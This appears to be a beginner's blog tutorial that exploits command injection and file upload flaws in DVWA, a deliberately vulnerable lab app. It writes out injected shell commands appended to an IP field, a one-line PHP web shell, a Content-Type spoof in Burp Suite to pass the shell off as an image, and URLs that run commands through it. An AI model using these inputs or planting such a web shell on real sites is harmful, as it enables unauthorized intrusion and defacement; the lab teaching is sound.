Website Hacking Series; Part B: Malicious Code injection & File Upload

Frankline Misango
8 min readFeb 26, 2023

--

Cover Image: Anonfile image label (source: මිස්ටර් 001 / Wikimedia commons)

Disclaimer: This article is for educational purposes and promotes ethical hacking and superior cybersecurity practices in organisations and private entities. It does not advocate for any malicious intent. Furthermore, all materials used in this tutorial are solely personal and intentionally set vulnerable. I, therefore, absolve myself from any future unauthorized scripting from parties reading this article that may compromise the integrity of respective wireless networks

Hello, welcome back to this series. We are exploiting website hacking tricks and today I will be demonstrating how we can upload malicious code and files disguised as images. Still, in reality, they are simple malicious scripts [For your understanding]. I Highly recommend you begin reading from part A which tackles how to brute force passwords to gain access to websites.

In this article, I will be covering how malicious code injection and file upload attacks. Have you visited websites that often ask users to upload their images/answers/pdfs etc to their Database? Well, it’s possible to disguise these files as legitimate ones whilst embedding them with bash scripts that can manipulate the integrity of such websites. I will be covering both of these in two separate parts but they are often similar.

Unlike the previous article, this article is less technical and has more of a type and upload vibe. Any script kiddie can do ( I really don’t know if I am a hacker yet or a mature script kiddie :) btw ).

Requirements

  • Kali Linux Separate OS /VMware Kali Linux
  • Burpsuite(installed by default in Kali)
  • DVWA (download from https://github.com/digininja/DVWA )
  • MySQL ( installed by default in kali)
  • Apache (installed by default in kali)
  • Basic mastery of MySQL, PHP & Bash scripting.

Procedure I — Malicious code injection

  1. Installing & running DVWA. This video offers the best explanation for getting DVWA up and running and explains in video my script instructions below (if you succeed, jump to step 2 directly ). Furthermore, I fully covered it in the previous article step 1. Read more here. Make sure you have a window as below. We set our Username and password as Admin & password respectively.
Type admin and password to gain access to the window

2. After logging into DVWA, navigate to the command injection window and find the window below. I am sure you are familiar with the window below. Most websites that require users to type their input mostly ask for their IP addresses if a user wants to determine his/her location. The window below mimics that

3. Scroll down and select view source to observe what the PHP code looks like. After looking at this, we can see the code requests an IP address and posts it. This code however does not put in place any preventive measure that bars us from typing anything else that is not an IP address code. We would expect code, like in figure 3.2 below, that evaluates whether the user really inputted an IP address.

Figure 3.1 We can basically see that there is no measure to check whether the input is in the format of an IP address or not; compare that to figure 3.2
Figure 3.2 We can see that there is a robust measure to check that the input is in the form of an IP address and bars any attempt to malicious inject any malicious code

4. Let’s type in our DVWA IP address [ 127.0.0.1 ] and assess the output. You can view more about the ping command here. But basically, ping allows us to view whether another device in the same network is reachable. For example, let us say I have connected my Kali PC and windows PC to the same WIFI router and I want to see whether the Kali PC can communicate with the Windows PC. I just type ping {Ip address of the windows machine}. The screenshot below ascertains that indeed it’s possible to communicate with our DVWA from our “Pinging website”.

Note the response before proceeding to the next steps

5. We can type in our DVWA IP address and another command since we noted from step 3 that there is no preventive measure that really ascertains whether the user typed in an IP address. For this case, we can go with 127.0.0.1 & ls → This command lists the files in the web app plus the required pinging output. A hacker may want to view which files are in the system’s root and decide which one is easy to exploit. View the screenshot below. For fun, try the IP address and other commands that can alter the output. Try [127.0.0.1 & echo “Good morning, Your website is Hacked ]

After typing 127.0.1 & ls -> A hacker can exploit this weakness to come up with ideas behind suitable attacks to pursue.
We have echoed our custom text. onto the next challenge:)

6. You are done!! That is basically the main idea behind malicious command injection

Procedure II -Malicious File Upload

  1. Navigate to the File Upload section. You should have a window as below.
Typical file upload window

2. We can see the prompt requires us to upload an image file. We can try uploading both an image file and a non-image file and see what the response is. I will navigate to the folder, hacking_tools, from where I want to upload the files from. I first copy an image and name it hack.png(Choose any name/png/jpg you want). I then create an empty text file called hack.txt. I will then upload each and pose the prompt below. We note hack.png is accepted while hack.txt is denied

Figure 2.1 creating an empty hack.txt and any other hack.png image for testing
Figure 2.2 We note availability of the two images
Figure 2.3 : Testing hack.png upload
Figure 2.4: Results of hack.png…We can see that it is indeed successful
Figure 2.5: Trying to upload hack.txt; we expect a rejection
Figure 2.6: Indeed; the file has been rejected by the system

3. Time to observe the PHP source code and gain a deeper understanding of the algorithm. From the PHP, we note we only need to upload a jpeg/png file of fewer than 100,000 bytes. Should the conditions fail, we note “Your image was not uploaded”.

We note the upload folder and the characteristics of the image we should upload. similar wise, we note which messages should be output once we are successful

4. The biggest trick we need to implement is to trick the that the Malicious PHP file that we would upload is indeed an image file. That is where Burpsuite comes in. Remember in the previous article, we installed foxy proxy that sets up a proxy config for the Burpsuite. First, we need to set the Foxyproxy burp configuration ON and burspsuite ON [ We covered how to configure foxy proxy and Burpsuite intercept to ON in the previous article ]

Turning on The foxyproxy that sets proxy config to burpsuite. Burpsuite that intercepts this i.e port 8080
Set the burpsuite configuration to on

5. We need to create a malicious PHP, shell.php, in the hacking file, calls the cmd. I will demonstrate, in step 9, how we can use the cmd to parse in common Linux commands to either display the files in the web app directory or the users behind the web app etc [basic scripts for average readers]. See the figure and code snippet below.

<? php

system($_GET[‘cmd’])

?>

Basic configuration of the shell.php. After typing vi shell.php, type the PHP code and finally type more to confirm that it's indeed typed as intended

6. We need to now upload the shell.php to the file in the same procedure as step 2. Note: Since we are intercepting with Burpsuite, remember the traffic first passes via it before it’s forwarded to the web server for execution. When we click upload below, the Burpsuite window pops up and we can view some key elements as highlighted in red in the figure below.

The window below opens immediately and we can begin disguising our file
We note the highlighted stuff and then decipher if we can change the Content-type to image/jpeg to begin the attack

7. On the Content-Type, we need to change to image/jpeg to trick the system into thinking we are uploading an image file while indeed it’s a PHP file as from step 7. The system cannot accept any other file apart from an image. Click forward in the Upper left corner. We should see a successful upload message in the next window after that when we go back to the DVWA page. We can then turn OFF Burpsuite Intercept

We edit to image/jpeg and click foward
After opening the window, we notice that shell.php has been uploaded after being disguised as an image

8. We need to note the successful message below the window. We can see the file has been uploaded to “hackable/uploads/shell.php”. We need to access that file by typing the command below in the search bar and invoking the cmd and giving it a common command called “ls” that lists all the files in the directory. We can see the files listed below !!
127.0.0.1/DVWA/hackable/uploads/shell.php?cmd=ls

We begin the exploitation by a simple ls command that we expect to list all the files
We can see the hack.png we uploaded earlier

9. Voila, we have finally finished the file upload. We can now tinker with the cmd command and parse into it this command:
127.0.0.1/DVWA/hackable/uploads/shell.php?cmd=echo “Your website has been hacked by Frankline, welcome ”

Final image

Follow up Notes

  1. You can construct basic websites and enable the file upload page function. You can then exercise this scripting tutorial to experience a real-world practicum.
  2. Ramp up your knowledge of these languages: PHP, HTML & bash to understand website dynamics and bash scripting.
  3. Practice! Mastering such complex hacking tricks takes time and absolute commitment and patience to learn. You wanna be a hacker right? Well, it’s always not what you see in movies…..This is what hacking looks like.

Recommendations

  1. Frontend Software Engineers in an organization need to write cohesive, multi-tested code that checks multiple parameters of the file uploaded. This has just been a basic example of poor scripting practice that we, newbies, could exploit. They are hackers out there who can bypass the most intricate non-security loops far better and even attach meterpreter backdoors/keyloggers to such files and gain remote access to the server. Read my article on how we can spy on remote computers using a backdoor keylogger

Thanks for reading, Be an ethical hacker out there :)

Feel free to contact me for Software Engineering Projects / Internship here

--

--